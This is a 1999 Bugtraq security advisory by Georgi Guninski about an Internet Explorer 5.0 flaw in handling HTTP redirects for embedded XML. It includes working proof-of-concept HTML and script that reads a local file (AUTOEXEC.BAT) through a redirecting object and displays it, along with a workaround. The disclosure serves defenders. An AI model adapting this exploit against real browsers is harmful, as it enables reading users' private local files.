Bugtraq mailing list archives
IE 5.0 XML HTTP redirect problems
From: joro () NAT BG (Georgi Guninski)
Date: Mon, 22 Nov 1999 17:21:54 +0200
Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (guess other versions are affected) has security problems with HTTP redirects in XML objects. This allows at least: 1) Reading any (local or nonlocal) XML file and any wellformed documents. With the growing influence of XML I consider this a serious problem. 2) Reading parts of documents 3) Checking for the existence of local files. I suppose reading of arbitrary files (not just XML) is also possible, but do not have the time to explore. Details: When one embeds a XML document in a HTML document IE 5.0 does not handle properly HTTP redirects and allows access to the DOM of the embeded XML document. The code is: ---------------------------------------------------------------------------------------- <object id="xm" type="text/xml" data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200> </object> <SCRIPT> function f() { s=xm.body.innerHTML; a=window.open(); //alert(s); a.document.open(); a.document.write("Here is a part of AUTOEXEC.BAT (the error message is normal):<BR>"+s); a.document.close(); } setTimeout("f()",5000); </SCRIPT> ---------------------------------------------------------------------------------------- Workaround: Disable Active Scripting or Disable Script ActiveX Controls marked Safe for Scripting Demonstration is available at http://www.nat.bg/~joro/xmln.html Copyright 1999 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro
Current thread:
- Re: Oracle 8 root exploit, (continued)
- Re: Oracle 8 root exploit Adam and Christine Levin (Nov 15)
- Re: Oracle 8 root exploit Jared Still (Nov 16)
- Re: Oracle 8 root exploit Martin Mevald (Nov 15)
- Re: Oracle 8 root exploit Antonomasia (Nov 15)
- Re: Oracle 8 root exploit Elias Levy (Nov 16)
- Re: Oracle 8 root exploit Adam and Christine Levin (Nov 16)
- Re: Oracle 8 root exploit Chris Calabrese (Nov 16)
- Re: Oracle 8 root exploit Alan Olsen (Nov 19)
- [RHSA-1999:055-01] Denial of service attack in syslogd Bill Nottingham (Nov 19)
- [ COBALT ] Security Advisory - syslog Jeff Bilicki (Nov 20)
- IE 5.0 XML HTTP redirect problems Georgi Guninski (Nov 22)
- DoS with sysklogd, glibc (Caldera) Alfred Huger (Nov 22)
- Re: DoS with sysklogd, glibc (Caldera) Balazs Scheidler (Nov 22)
- Re: Oracle 8 root exploit Steve D'Angona (Nov 18)
- Re: Oracle 8 root exploit Chris Calabrese (Nov 18)